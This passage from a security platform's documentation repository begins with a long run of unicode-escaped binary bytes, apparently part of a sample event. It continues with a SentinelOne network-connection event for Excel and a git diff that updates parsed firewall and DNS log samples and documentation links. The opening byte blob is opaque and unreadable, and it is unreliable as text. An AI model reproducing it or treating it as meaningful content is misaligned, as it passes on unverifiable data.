2b\u6f06\u01b1\u0a00\u0413\u4e2b\u0412\ub228\u0001\u0b0a\u0112\u0e28\u0001\u0c0a\u0112\u0f28\u0001\u0d0a\u2c05\u080e\u6872'\u1b70\u946f\u0000\u2d0a\u0325\u0208\u2809\u024c\u0600\u2802\u0217\u0600\ua928\u0005\ufffd\u260f\ud472,\u0970\u28080\u2b00\u1afe\u0412\ub328\u0001\u2d0a\ufffd\u120e\ufe04\u8716\u0000\u6f1b\u0003\u0a00\u2adc\u0000\u1c01\u0000\u0000?\u5516\u0f00\u0154\u0200\u0002\u0014\u6f5b\u0e00\u0000\u0000\u3013\u0004A\u0000q\u1100\u6f04\u01ff\u0600\u030b\u1207\u2800\u05ab\u0600\u2d2c\u0402\u6f06\u01b4\u0a00\u4b28\u0002\u0c06\u2c08\u021c\u0408\u2817\u0246\u0600\u0802\u2804\u0249\u0600\u0306\u1408\ub56f\u0001\u170a\u162a*\u0000\u3013\u0004:\u0000r\u1100\u6f04\u0205\u0600\u022c\u2a16\u6f04\u01ff\u0600\u030a\u1206\u2801\u05ab\u0600\u022d\u2a16\u0307\u6f14\u01af\u0a00\u020c\u0408\u2817\u0246\u0600\u0802\u2804\u0249\u0600\u2a17\u0000\u301b\u0003?\u0000s\u1100\u6f04\u0203\u0600\u2c28\u0000\u0a2b\u6f06\u019a\u0a00\u2b0c\u1210\u2802\u019b\u0a00\u020b\u0703\u4428\u0002\u1206\u2802\u019c\u0a00\ue72d\u0ede\u0212\u16fe~\u1b00\u036f\u0000\ufffd*\u1001\u0000\u0002\u0013\u301d\u0e00\u0000\u0000\u3013\u0004\u00b1\u0000t\u1100\u7204\u2768\u7000\u086f\u0002\u2806\u0230\u0600\u020a\u1728\u0002\u6f06\u0164\u0600\u6f06\u01a6\u0a00\u070b\u9575\u0001\u0c02\u2d08\u720b\u2d2a\u7000\u5573\f\u7a06\u0702\u1404\u3e28\u0002\u2b06\u081a\u856f\u000f\u7506\u0195\u0200\u080c\u0b2d\ua872-\u7370\u0c55\u0600\u087a\u856f\u000f\u2d06\u08de\u6f03\u0f86\u0600\u0307\u806f\f\u6f06\u0c81\u0600\u0303\u806f\f\u7206\u1dfd\u7000\u9928\u0000\u6f0a\u0c81\u0600\u3372.\u0770\u806f\f\u0706\ua56f\u0000\u6f0a\u00a6\u0a00\u6f03\u0c80\u0600\u3228\u0000\u072b*\u0000\u3013\u0003C\u0000&\u1100\u1ed0\u0001\u2802~\u0a00\u6f04\u01b6\u0a00\u022d\u2a14\u7203\u2768\u7000\u6f14\u020b\u0600\u3028\u0002\u0a06\u2d06\u1402\u022a\u1728\u0002\u6f06\u0168\u0600\u0602\u4c28\u0002\u6f06\u01b7\u0a00*\u301b\u0004i\u0000u\u1100\u0a03\u2802\u01ad\u0600\u3328\u0000\u0b2b\u6f07\u01b8\u0a00\u0413\u362b\u0412\ub928\u0001\u0c0a\u0212\u3f28\u0001\u0d0a\u2c09\u0623\u9f72.\u1270\u2802\u013e\u0a00\ua572.\u2870\u009d\u0a00\u6f09\u08c1\u0600\ub76f\u0000\u0a0a\u0412\uba28\u0001\u2d0a\ufffd\u120e\ufe04\u8a16\u0000\u6f1b\u0003\u0a00\u06dc*\u0000\u1001\u0000\u0002\u0016\u5943\u0e00\u0000\u0000\u023a\u2728\u0000\u020a\u2816\u0255\u0600\u1e2a\u7b02\u00c4\u0400\u222a\u0302\uc47d\u0000\u2a04\u0222\u6f03\u0257\u0600\u1e2a\u7b02\u00c6\u0400\u222a\u0302\uc67d\u0000\u2a04\u0000\u3013\u0002#\u0000]\u1100\u2802\u0258\u0600\u6f03\u00cf\u0600\u7e0a\u00c5\u0400\u6f06\u0093\u0a00\u072c\u2802\u0254\u0600\u162a\u322a\u8c17\u00cc\u0100\uc580\u0000\u2a04\u021e\u5328\u0002\u2a06\u0222\u2803\u00f2\u0600\u1e2a\u2802\u0253\u0600\u1e2a\u7b02\u00cd\u0400\u222a\u0302\ucd7d\u0000\u2a04\u021e\uce7b\u0000\u2a04\u0222\u7d03\u00ce\u0400\u1e2a\u7b02\u00cf\u0400\u222a\u0302\ucf7d\u0000\u2a04\u3013\u00031\u0000v\u1100\u2802\u0261\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u6328\u0002\u0606\u956f\u0000\u160a\u0732\u2802\u0254\u0600\u162a\u1e2a\u2802\u025e\u0600\u1e2a\u7b02\u00d0\u0400\u222a\u0302\ud07d\u0000\u2a04\u021e\ud17b\u0000\u2a04\u0222\u7d03\u00d1\u0400*\u3013\u00030\u0000v\u1100\u2802\u0267\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u6928\u0002\u0606\u946f\u0000\u2c0a\u0207\u5428\u0002\u2a06\u2a16\u021e\u5e28\u0002\u2a06\u021e\ud27b\u0000\u2a04\u0222\u7d03\u00d2\u0400\u1e2a\u7b02\u00d3\u0400\u222a\u0302\ud37d\u0000\u2a04\u0000\u3013\u00033\u0000w\u1100\u2802\u026f\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0b06\u0207\u6d28\u0002\u0606\u956f\u0000\u160a\u072f\u2802\u0254\u0600\u162a\u1e2a\u2802\u025e\u0600\u1e2a\u2802\u025e\u0600\u1e2a\u7b02\u00d4\u0400\u222a\u0302\ud47d\u0000\u2a04\u021e\ud57b\u0000\u2a04\u0222\u7d03\u00d5\u0400*\u0000\u3013\u00030\u0000v\u1100\u2802\u0276\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u7428\u0002\u0606\u946f\u0000\u2d0a\u0207\u5428\u0002\u2a06\u2a16\u0222\u2803\u0280\u0600\u322a\uf57e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02f6\u0400\u2802\u0280\u0600\u322a\uf77e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02f8\u0400\u2802\u0280\u0600\u322a\uf97e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02fa\u0400\u2802\u0280\u0600*\u3013\u0003@\u0000x\u1100\u2503\u062d\u7e26[\u0a00\ubc28\u0001\u0a0a\u2806\u01bd\u0a00\u082d\u2806\u0b48\u0600\u052b\ud67e\u0000\u0b04\u0207\u8373\u0002\u0c06\u2c03\u080d\ua972.\u0370\u8f6f\u0002\u2606\u2a08\u282e\u0b43\u0600\ud680\u0000\u2a04\u0236\u7e03\u02f6\u0400\u8328\u0002\u2a06\u0000\u3013\u0003`\u0000y\u1100\u2802'\u0a00\u2d03\u720b\u065b\u7000\u2073\u0001\u7a0a\u1404\u2328\u000b\u2c06\u720b\u2ec7\u7000\u2073\u0001\u7a0a\u0302\ufffd\u0204\ud473\b\u0a06\u0406\ufffd\b\u0606\u6f03\u02b0\u0600\ue76f\b\u0606\u3328\u0010\u6f06\u1032\u0600\ufffd\u0606\ud77d\u0000\u2a04\u021e\ud77b\u0000\u2a04\u023a\ud77b\u0000\u0304\ue56f\b\u0206\u8a2a\u1403\u2328\u000b\u2c06\u720b\u2ec7\u7000\u2073\u0001\u7a0a\u7b02\u00d7\u0400\u6f03\u08dd\u0600\u2a02\u023a\ud77b\u0000\u0304\ue76f\b\u0206\u3a2a\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u2a02\u3013\u0004%\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d17\u0004\u0100\u060a\u0416\u06a2\uec6f\b\u0206*\u0000\u3013\u0004)\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d18\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\uec6f\b\u0206*\u0000\u3013\u0004.\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d19\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\u0e18\ua204\u6f06\u08ec\u0600\u2a02\u0000\u3013\u00043\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d1a\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\u0e18\ua204\u1906\u050e\u06a2\uec6f\b\u0206\u6a2a\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u6f04\u08ec\u0600\u2a02\u029a\ud77b\u0000\u0304\uee6f\b\u0206\ud77b\u0000\u0404\uea6f\b\u0206\ud77b\u0000\u0504\uec6f\b\u0206\u8a2a\u2d03\u720b\u16ae\u7000\u2073\u0001\u7a0a\u7b02\u00d7\u0400\uf16f\b\u0306\u6f04\u01be\u0a00\u2a02\u301b\u0004X\u0000z\u1100\u2d03\u720b\u2ed9\u7000\u2073\u0001\u7a0a\u6f03\u01bf\u0a00\u026f\u0000\u0b0a\u1f2b\u6f07\u0005\u0a00\u020a\ud77b\u0000\u6f04\u08f1\u0600\u0306\u6f06\u01c0\u0a00\ube6f\u0001\u070a\u2a6f\u0000\u2d0a\ufffd\u0711\u0a75\u0000\u0c01\u2c08\u0806\u036f\u0000\ufffd\u2a02\u1001\u0000\u0002\u001a\u452b\u1100\u0000\u0000\u023a\ud77b\u0000\u0304\ufffd\u0206\u3e2a\u7b02\u00d7\u0400\u0403\ufc6f\b\u0206*\u3003\u0003G\u0000\u0000\u0000\u2c03\u020d\uef72.\u0370\u8f28\u0002\u2606\u2c04\u020d\ua972.\u0470\u8f28\u0002\u2606\u2c05\u0212\u1172/\u0570\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u3003\u0003U\u0000\u0000\u0000\u2c03\u0308\uc16f\u0001\u2d0a\u2a01\u2c04\u020d\uef72.\u0470\u8f28\u0002\u2606\u2c05\u020d\ua972.\u0570\u8f28\u0002\u2606\u040e\u132c\u7202\u2f11\u7000\u040e\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u0000\u3003\u0003M\u0000\u0000\u0000\u2d03\u2a01\u2c04\u020d\uef72.\u0470\u8f28\u0002\u2606\u2c05\u020d\ua972.\u0570\u8f28\u0002\u2606\u040e\u132c\u7202\u2f11\u7000\u040e\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u0000\u3013\u0002\n\u0000{\u1100\u0302\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f5\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f6\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f7\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f8\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f9\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02fa\u0400\u8373\u0002\u0a06\u2a06\u0222\u2803\u02a4" - } - ``` - - - -=== "tcpv4" - - - ```json - { - "meta": { - "seqId": 51, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "620565A45ABA475FB419254BE2152CA4", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630518385" - }, - "event_type": "tcpv4", - "trueContext": { - "key": { - "value": "C5307F702A45841C" - } - }, - "source": { - "node": { - "key": { - "value": "CE27A4E72749E6F2" - } - }, - "executable": { - "node": { - "key": { - "value": "88D134761AF47342" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "64262984", - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION", - "valid": {} - } - }, - "hashes": { - "sha1": "c20704e15fa16fd333cf61c5611dc74299284d7d", - "sha256": "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4", - "md5": "3dcef51688df91a37bc07d8a261a9427" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" /vu \"C:\\Users\\l.maoui\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\GMYOE03V\\S36 -2021.xlsx\"", - "fullPid": { - "pid": 19376, - "startTime": { - "millisecondsSinceEpoch": "1631603628039" - } - }, - "user": { - "name": "CORP\\l.maoui", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "9C0BFCE246E832C2" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Microsoft Excel", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 10, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "C5307F702A45841C" - } - }, - "counters": { - "moduleLoad": 1775, - "fileCreation": 136, - "fileDeletion": 63, - "fileModification": 436, - "netConnOut": 261, - "registryModification": 7653, - "dnsLookups": 108 - } - }, - "sourceAddress": { - "address": "10.26.8.27", - "port": 50965 - }, - "destinationAddress": { - "address": "52.182.143.208", - "port": 443 - }, - "direction": "OUTGOING", - "status": "SUCCESS" - } - ``` - - - diff --git a/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md b/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md index 1ce85b9109..21f3cedc2f 100644 --- a/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md +++ b/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md b/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md index 9f461f90f1..80010f5bf5 100644 --- a/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md +++ b/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_antivirus_alert.json" diff --git a/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md b/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md index 90d926cf61..e6d033a989 100644 --- a/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md +++ b/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "breach_reported_event.json" diff --git a/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md b/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md index bbb43576a3..68410ee73e 100644 --- a/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md +++ b/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "DNS_Tunnel.json" @@ -150,7 +150,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "_ldap._tcp.dc._msdcs.subdomain.corp.intra.", + "name": "_ldap._tcp.dc._msdcs.subdomain.corp.intra", "subdomain": "_ldap._tcp.dc._msdcs.subdomain.corp" }, "response_code": "NXDOMAIN", @@ -159,7 +159,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "_ldap._tcp.dc._msdcs.subdomain.corp.intra." + "_ldap._tcp.dc._msdcs.subdomain.corp.intra" ], "ip": [ "1.1.1.1" @@ -202,7 +202,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "10.1.1.1_1.", + "name": "10.1.1.1_1", "subdomain": "10.1.1", "type": "A" }, @@ -212,7 +212,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "10.1.1.1_1." + "10.1.1.1_1" ], "ip": [ "10.1.1.1", @@ -255,7 +255,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "emea.corp.", + "name": "emea.corp", "subdomain": "emea", "type": "A" }, @@ -265,7 +265,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "emea.corp." + "emea.corp" ], "ip": [ "1.1.1.1" @@ -310,7 +310,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "substrate.office.com.", + "name": "substrate.office.com", "registered_domain": "office.com", "subdomain": "substrate", "top_level_domain": "com", @@ -322,7 +322,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "substrate.office.com." + "substrate.office.com" ], "ip": [ "1.1.1.1" diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md index 51f3f3c690..99043dfd48 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "User_id_1_csv.json" @@ -175,9 +175,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-02-28T18:20:54Z", + "action": { + "type": "radius" + }, "destination": { "user": { - "name": "paloaltonetwork\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "host": { @@ -223,7 +227,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "xxxxx" ], "user": [ - "paloaltonetwork\\\\xxxxx" + "xxxxx" ] } } @@ -251,6 +255,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", @@ -260,7 +267,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 20122, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "log": { @@ -298,7 +306,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.1.1.1" ], "user": [ - "paloaltonetwork\\\\\\\\xxxxx" + "xxxxx" ] }, "rule": { @@ -314,11 +322,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 16524, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } } @@ -345,6 +355,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:06:06Z", + "action": { + "type": "file" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", @@ -428,6 +441,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", "event": { + "action": "allow", "category": [ "network" ], @@ -486,7 +500,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "5.6.7.8" ], "user": [ - "domain\\pusername", + "pusername", "userdest" ] }, @@ -505,11 +519,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "packets": 6, "port": 51413, "user": { - "name": "domain\\pusername" + "domain": "domain", + "name": "pusername" } }, "user": { - "name": "domain\\pusername" + "domain": "domain", + "name": "pusername" } } @@ -523,6 +539,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", "event": { + "action": "allow", "category": [ "network" ], @@ -631,6 +648,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "name": "satellite-gateway-update-route", + "type": "globalprotect" + }, "host": { "hostname": "machine_name2", "name": "machine_name2", @@ -665,16 +686,18 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "machine_name2" ], "user": [ - "xxxxx\\\\\\\\xxxxx" + "xxxxx" ] }, "source": { "user": { - "name": "xxxxx\\\\\\\\xxxxx" + "domain": "xxxxx", + "name": "xxxxx" } }, "user": { - "name": "xxxxx\\\\\\\\xxxxx" + "domain": "xxxxx", + "name": "xxxxx" } } @@ -804,7 +827,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "88.120.236.74" ], "user": [ - "example.org\\\\test" + "test" ] }, "source": { @@ -814,11 +837,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "88.120.236.74", "user": { - "name": "example.org\\\\test" + "domain": "example.org", + "name": "test" } }, "user": { - "name": "example.org\\\\test" + "domain": "example.org", + "name": "test" }, "user_agent": { "os": { @@ -913,6 +938,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "allow", "category": [ "network" ], @@ -1006,6 +1032,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:20:13Z", + "action": { + "type": "iptag" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1" @@ -1046,6 +1075,241 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "network_threat_alert_1.json" + + ```json + + { + "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": \"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": \"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": 